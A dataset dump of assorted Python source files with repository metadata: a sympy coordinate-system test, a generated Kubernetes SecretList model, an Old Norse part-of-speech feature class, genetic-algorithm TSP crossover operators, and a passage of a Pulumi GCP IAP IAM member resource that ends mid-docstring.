Dataset schema (⌀ marks nullable columns; each row below pairs repository metadata with the file text in `content`):

| column | dtype | lengths / values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | sequence | length 1 to 10 |
| max_stars_count | int64 ⌀ | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | length 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | length 24 |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | sequence | length 1 to 10 |
| max_issues_count | int64 ⌀ | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string ⌀ | length 24 |
| max_issues_repo_issues_event_max_datetime | string ⌀ | length 24 |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | sequence | length 1 to 10 |
| max_forks_count | int64 ⌀ | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string ⌀ | length 24 |
| max_forks_repo_forks_event_max_datetime | string ⌀ | length 24 |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
89928632b2aee5d553cc4a4c8e3c39d3adbe978b | 1,075 | py | Python | sympkf/symbolic/test/test_coordinate.py | opannekoucke/sympkf | 914dbc8127f16d28b1fe2f5afe2bc0864d53d644 | ["CECILL-B"] | null | null | null | sympkf/symbolic/test/test_coordinate.py | opannekoucke/sympkf | 914dbc8127f16d28b1fe2f5afe2bc0864d53d644 | ["CECILL-B"] | null | null | null | sympkf/symbolic/test/test_coordinate.py | opannekoucke/sympkf | 914dbc8127f16d28b1fe2f5afe2bc0864d53d644 | ["CECILL-B"] | null | null | null |

import unittest
from sympkf.symbolic import CoordinateSystem
from sympy import symbols, Function, Matrix, Derivative
class TestCoordinateSystem(unittest.TestCase):
coords = CoordinateSystem(symbols('x y'))
def test_compatibility(self):
# Case not compatible
f = Function('f')(*symbols('t x'))
self.assertTrue(not self.coords.is_compatible(f))
# Case compatible
f = Function('f')(*symbols('t x y'))
self.assertTrue(self.coords.is_compatible(f))
def test_gradient_div(self):
# Case compatible
f = Function('f')(*symbols('t x y'))
x, y = symbols('x y')
# Computation of the gradient
grad_f = self.coords.gradient(f)
self.assertEqual(grad_f,Matrix([Derivative(f,x), Derivative(f,y)]))
# Computation of the divergent of the gradient which should be the laplacian here
div_grad_f = self.coords.div(grad_f)
lap_f = Derivative(f,x,2)+Derivative(f,y,2)
self.assertEqual(div_grad_f, lap_f)
if __name__ == '__main__':
unittest.main()
| 31.617647 | 89 | 0.653023 |
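A minimal usage sketch for the CoordinateSystem helper exercised by the test above. It assumes only the sympkf.symbolic API that the test itself imports (CoordinateSystem, is_compatible, gradient, div); everything else is standard sympy.

from sympy import symbols, Function
from sympkf.symbolic import CoordinateSystem

# build the coordinate system on (x, y), exactly as the test fixture does
coords = CoordinateSystem(symbols('x y'))

# a field f(t, x, y) carries both coordinates, so it is compatible
f = Function('f')(*symbols('t x y'))
assert coords.is_compatible(f)

# the divergence of the gradient reduces to the Laplacian, as the test asserts
grad_f = coords.gradient(f)   # Matrix([Derivative(f, x), Derivative(f, y)])
lap_f = coords.div(grad_f)    # Derivative(f, x, 2) + Derivative(f, y, 2)
print(lap_f)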
073b63d8c41de77411a8fab8e8aebe7c88f248d2 | 6,947 | py | Python | kubernetes/client/models/v1_secret_list.py | philipp-sontag-by/python | 51c481692ab0d9c71b9dd96342bfa93b721b029d | ["Apache-2.0"] | 1 | 2022-02-22T23:10:55.000Z | 2022-02-22T23:10:55.000Z | kubernetes/client/models/v1_secret_list.py | philipp-sontag-by/python | 51c481692ab0d9c71b9dd96342bfa93b721b029d | ["Apache-2.0"] | 6 | 2021-09-13T19:03:02.000Z | 2022-03-16T18:56:42.000Z | kubernetes/client/models/v1_secret_list.py | philipp-sontag-by/python | 51c481692ab0d9c71b9dd96342bfa93b721b029d | ["Apache-2.0"] | null | null | null |

# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1SecretList(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'items': 'list[V1Secret]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None, local_vars_configuration=None): # noqa: E501
"""V1SecretList - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""Gets the api_version of this V1SecretList. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1SecretList. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1SecretList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1SecretList. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""Gets the items of this V1SecretList. # noqa: E501
Items is a list of secret objects. More info: https://kubernetes.io/docs/concepts/configuration/secret # noqa: E501
:return: The items of this V1SecretList. # noqa: E501
:rtype: list[V1Secret]
"""
return self._items
@items.setter
def items(self, items):
"""Sets the items of this V1SecretList.
Items is a list of secret objects. More info: https://kubernetes.io/docs/concepts/configuration/secret # noqa: E501
:param items: The items of this V1SecretList. # noqa: E501
:type: list[V1Secret]
"""
if self.local_vars_configuration.client_side_validation and items is None: # noqa: E501
raise ValueError("Invalid value for `items`, must not be `None`") # noqa: E501
self._items = items
@property
def kind(self):
"""Gets the kind of this V1SecretList. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1SecretList. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1SecretList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1SecretList. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1SecretList. # noqa: E501
:return: The metadata of this V1SecretList. # noqa: E501
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1SecretList.
:param metadata: The metadata of this V1SecretList. # noqa: E501
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1SecretList):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1SecretList):
return True
return self.to_dict() != other.to_dict()
| 33.723301 | 312 | 0.622859 |
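A short, hypothetical construction example for the generated V1SecretList model above. It relies only on the constructor, the required items field and to_dict() shown in this file, and assumes V1Secret and V1ObjectMeta from the same generated kubernetes.client package.

from kubernetes import client

secret = client.V1Secret(metadata=client.V1ObjectMeta(name="demo-secret"),
                         string_data={"token": "placeholder"})
# items is mandatory: passing items=None raises ValueError when client-side
# validation is enabled, as enforced by the items setter above
secret_list = client.V1SecretList(api_version="v1", kind="SecretList", items=[secret])
print(secret_list.to_dict()["kind"])   # -> 'SecretList'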
88b1b7b4ecf8d06dc108fb62bb4d20a80ff91d94 | 4,040 | py | Python | edda/pos_utils.py | clemsciences/old_norse_notebook | 4e3608e9c0fa58b164009965f95052f309b15266 | ["MIT"] | 3 | 2018-11-30T13:42:18.000Z | 2021-04-15T22:39:31.000Z | edda/pos_utils.py | clemsciences/old_norse_notebook | 4e3608e9c0fa58b164009965f95052f309b15266 | ["MIT"] | null | null | null | edda/pos_utils.py | clemsciences/old_norse_notebook | 4e3608e9c0fa58b164009965f95052f309b15266 | ["MIT"] | null | null | null |

"""
"""
import abc
__author__ = ["Clément Besnier <clemsciences@aol.com>", ]
class POSFeatures:
def __init__(self):
self.masculine = False
self.feminine = False
self.neuter = False
self.singular = False
self.plural = False
self.dual = False
self.nominative = False
self.accusative = False
self.dative = False
self.genitive = False
self.definite = False
self.indefinite = False
self.positive = False
self.comparative = False
self.superlative = False
self.first = False
self.second = False
self.third = False
self.indicative = False
self.subjunctive = False
self.imperative = False
self.present = False
self.preterite = False
self.active = False
self.reflexive = False
self.infinitive = False
self.participle = False
self.strong = False
self.weak = False
self.reduplicating = False
self.preterito_present = False
self.noun = False
self.proper_noun = False
self.adjective = False
self.article = False
self.demonstrative = False
self.indefinite_demonstrative = False
self.possessive = False
self.personal = False
self.interrogative = False
self.relative = False
self.numeral = False
self.verb = False
self.adverb = False
self.conjunction = False
self.foreign = False
self.punctuation = False
self.unanalysed = False
def __eq__(self, other):
for i in range(len(self.vectorize())):
if self.vectorize()[i] != other.vectorize()[i]:
return False
return True
def vectorize(self):
return [
self.masculine,
self.feminine,
self.neuter,
self.singular,
self.plural,
self.dual,
self.nominative,
self.accusative,
self.dative,
self.genitive,
self.definite,
self.indefinite,
self.positive,
self.comparative,
self.superlative,
self.first,
self.second,
self.third,
self.indicative,
self.subjunctive,
self.imperative,
self.present,
self.preterite,
self.active,
self.reflexive,
self.infinitive,
self.participle,
self.strong,
self.weak,
self.reduplicating,
self.preterito_present,
self.noun,
self.proper_noun,
self.adjective,
self.article,
self.demonstrative,
self.indefinite_demonstrative,
self.possessive,
self.personal,
self.interrogative,
self.relative,
self.numeral,
self.verb,
            self.adverb,
            self.conjunction,
            self.foreign,
self.punctuation,
self.unanalysed
]
class POSElement:
@staticmethod
@abc.abstractmethod
def parse(tag, value):
return value
@staticmethod
@abc.abstractmethod
def binarize(tag, features):
pass
class POSAbstract:
"""
"""
@staticmethod
@abc.abstractmethod
def apply(tag, l_pos, value):
"""
:param tag:
:param l_pos:
:param value:
:return:
"""
pass
@staticmethod
@abc.abstractmethod
def binarize(tag, l_pos, value):
"""
:param tag: POS tag
:param l_pos:
:param value:
:return:
"""
pass
@staticmethod
@abc.abstractmethod
def parse(full_tag, vector=False):
"""
:param full_tag: Pars oratori in annotated documents
:param vector:
:return: readable form of the POS tag
"""
pass
| 23.625731 | 60 | 0.52698 |
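An illustrative snippet for the POSFeatures container above, using nothing beyond what the class defines (boolean flags, vectorize() and the element-wise __eq__); the import path simply mirrors this repository layout.

from edda.pos_utils import POSFeatures

a = POSFeatures()
a.noun, a.singular, a.nominative = True, True, True

b = POSFeatures()
b.noun, b.singular, b.nominative = True, True, True

# __eq__ compares the two boolean vectors position by position
assert a == b
# vectorize() flattens the flags into a fixed-order feature vector
print(sum(a.vectorize()))   # 3 active features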
37f61b88032ad641c1db3f33e4a9d1320a04dab3 | 34 | py | Python | tests/__init__.py | phzwart/qlty | 701688e7cf00abfb5624042aa296099ee2e95773 | ["BSD-3-Clause"] | null | null | null | tests/__init__.py | phzwart/qlty | 701688e7cf00abfb5624042aa296099ee2e95773 | ["BSD-3-Clause"] | null | null | null | tests/__init__.py | phzwart/qlty | 701688e7cf00abfb5624042aa296099ee2e95773 | ["BSD-3-Clause"] | null | null | null |

"""Unit test package for qlty."""
| 17 | 33 | 0.647059 |
680bb718aec1426bf0c9c4c9c90f92a41b881be4 | 2,124 | py | Python | GA_tsp_optimisation/crossover.py | JessikaSmith/OptimizationAlgorithms | bf0f871f4d6150e1e7533360cfc6f70eb616c870 | ["MIT"] | 15 | 2018-11-16T04:42:44.000Z | 2020-03-20T16:00:47.000Z | GA_tsp_optimisation/crossover.py | JessikaSmith/OptimizationAlgorithms | bf0f871f4d6150e1e7533360cfc6f70eb616c870 | ["MIT"] | null | null | null | GA_tsp_optimisation/crossover.py | JessikaSmith/OptimizationAlgorithms | bf0f871f4d6150e1e7533360cfc6f70eb616c870 | ["MIT"] | 3 | 2019-01-17T13:18:56.000Z | 2019-12-17T22:22:48.000Z |

import numpy as np
class Crossover:
def __init__(self, crossover_type, **kwargs):
self.crossover_type = crossover_type
def crossover(self, parent_1, parent_2, **kwargs):
if self.crossover_type == 'pmx':
return self.crossover_pmx(parent_1=parent_1, parent_2=parent_2)
if self.crossover_type == 'ordered':
return self.ordered_crossover(parent_1=parent_1, parent_2=parent_2)
if self.crossover_type == 'cycle':
return self.cycle_crossover(parent_1=parent_1, parent_2=parent_2)
    def crossover_pmx(self, parent_1, parent_2):
        points_num = len(parent_1)
        cut_ix = np.random.choice(points_num - 2, 2, replace=False)
        min_ix = np.min(cut_ix)
        max_ix = np.max(cut_ix)
        def pmx_child(p_main, p_other):
            # keep the cut segment of p_main and map conflicting genes of p_other
            # through that segment so that no city appears twice in the child
            child, segment = list(p_other), list(p_main[min_ix:max_ix])
            for i in list(range(min_ix)) + list(range(max_ix, points_num)):
                gene = p_other[i]
                while gene in segment:
                    gene = p_other[list(p_main).index(gene)]
                child[i] = gene
            child[min_ix:max_ix] = segment
            return [int(g) for g in child]
        return pmx_child(parent_1, parent_2), pmx_child(parent_2, parent_1)
def ordered_crossover(self, parent_1, parent_2):
points_num = len(parent_1)
cut_ix = np.random.choice(points_num - 2, 2, replace=False)
min_ix = np.min(cut_ix)
max_ix = np.max(cut_ix)
offspring_1 = np.zeros(points_num)
current_ix = 0
set_1 = parent_1[min_ix:max_ix]
for i, elem in enumerate(parent_2):
if elem not in set_1:
if current_ix != min_ix:
offspring_1[current_ix] = elem
else:
current_ix = max_ix
offspring_1[current_ix] = elem
current_ix += 1
offspring_1[min_ix:max_ix] = set_1
offspring_2 = np.zeros(points_num)
current_ix = 0
set_2 = parent_2[min_ix:max_ix]
for i, elem in enumerate(parent_1):
if elem not in set_2:
if current_ix != min_ix:
offspring_2[current_ix] = elem
else:
current_ix = max_ix
offspring_2[current_ix] = elem
current_ix += 1
offspring_2[min_ix:max_ix] = set_2
return [int(i) for i in offspring_1], [int(i) for i in offspring_2]
def cycle_crossover(self, parent_1, parent_2):
raise NotImplementedError
| 37.263158 | 79 | 0.59322 |
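A quick, hypothetical driver for the Crossover class above using the ordered variant; parents are plain permutations of city indices, which is what the implementation expects, and the import path mirrors this repository layout.

from GA_tsp_optimisation.crossover import Crossover

parent_1 = [0, 1, 2, 3, 4, 5, 6, 7]
parent_2 = [3, 7, 0, 6, 2, 5, 1, 4]

cx = Crossover(crossover_type='ordered')
child_1, child_2 = cx.crossover(parent_1, parent_2)

# both children remain valid tours, i.e. permutations of the same cities
assert sorted(child_1) == sorted(parent_1)
assert sorted(child_2) == sorted(parent_2)
print(child_1, child_2)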
4089776c4b5d23d28aa5ec3b1bddafba61a6bc9f | 26,087 | py | Python | sdk/python/pulumi_gcp/iap/web_iam_member.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | ["ECL-2.0", "Apache-2.0"] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/iap/web_iam_member.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | ["ECL-2.0", "Apache-2.0"] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/iap/web_iam_member.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | ["ECL-2.0", "Apache-2.0"] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z |

# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['WebIamMemberArgs', 'WebIamMember']
@pulumi.input_type
class WebIamMemberArgs:
def __init__(__self__, *,
member: pulumi.Input[str],
role: pulumi.Input[str],
condition: Optional[pulumi.Input['WebIamMemberConditionArgs']] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a WebIamMember resource.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
:param pulumi.Input['WebIamMemberConditionArgs'] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
pulumi.set(__self__, "member", member)
pulumi.set(__self__, "role", role)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def member(self) -> pulumi.Input[str]:
return pulumi.get(self, "member")
@member.setter
def member(self, value: pulumi.Input[str]):
pulumi.set(self, "member", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['WebIamMemberConditionArgs']]:
"""
) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['WebIamMemberConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _WebIamMemberState:
def __init__(__self__, *,
condition: Optional[pulumi.Input['WebIamMemberConditionArgs']] = None,
etag: Optional[pulumi.Input[str]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering WebIamMember resources.
:param pulumi.Input['WebIamMemberConditionArgs'] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] etag: (Computed) The etag of the IAM policy.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
if condition is not None:
pulumi.set(__self__, "condition", condition)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if member is not None:
pulumi.set(__self__, "member", member)
if project is not None:
pulumi.set(__self__, "project", project)
if role is not None:
pulumi.set(__self__, "role", role)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['WebIamMemberConditionArgs']]:
"""
) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['WebIamMemberConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The etag of the IAM policy.
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter
def member(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "member")
@member.setter
def member(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "member", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
class WebIamMember(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Three different resources help you manage your IAM policy for Identity-Aware Proxy Web. Each of these resources serves a different use case:
* `iap.WebIamPolicy`: Authoritative. Sets the IAM policy for the web and replaces any existing policy already attached.
* `iap.WebIamBinding`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the web are preserved.
* `iap.WebIamMember`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the web are preserved.
> **Note:** `iap.WebIamPolicy` **cannot** be used in conjunction with `iap.WebIamBinding` and `iap.WebIamMember` or they will fight over what your policy should be.
> **Note:** `iap.WebIamBinding` resources **can be** used in conjunction with `iap.WebIamMember` resources **only if** they do not grant privilege to the same role.
## google\_iap\_web\_iam\_policy
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.organizations.GetIAMPolicyBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
),
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
## google\_iap\_web\_iam\_binding
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"])
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.iap.WebIamBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## google\_iap\_web\_iam\_member
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com")
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com",
condition=gcp.iap.WebIamMemberConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## Import
For all import syntaxes, the "resource in question" can take any of the following forms* projects/{{project}}/iap_web * {{project}} Any variables not passed in the import command will be taken from the provider configuration. Identity-Aware Proxy web IAM resources can be imported using the resource identifiers, role, and member. IAM member imports use space-delimited identifiersthe resource in question, the role, and the member identity, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor user:jane@example.com"
```
IAM binding imports use space-delimited identifiersthe resource in question and the role, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor"
```
IAM policy imports use the identifier of the resource in question, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor projects/{{project}}/iap_web
```
-> **Custom Roles**If you're importing a IAM resource with a custom role, make sure to use the
full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WebIamMemberArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Three different resources help you manage your IAM policy for Identity-Aware Proxy Web. Each of these resources serves a different use case:
* `iap.WebIamPolicy`: Authoritative. Sets the IAM policy for the web and replaces any existing policy already attached.
* `iap.WebIamBinding`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the web are preserved.
* `iap.WebIamMember`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the web are preserved.
> **Note:** `iap.WebIamPolicy` **cannot** be used in conjunction with `iap.WebIamBinding` and `iap.WebIamMember` or they will fight over what your policy should be.
> **Note:** `iap.WebIamBinding` resources **can be** used in conjunction with `iap.WebIamMember` resources **only if** they do not grant privilege to the same role.
## google\_iap\_web\_iam\_policy
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.organizations.GetIAMPolicyBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
),
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
## google\_iap\_web\_iam\_binding
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"])
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.iap.WebIamBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## google\_iap\_web\_iam\_member
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com")
```
With IAM Conditions:
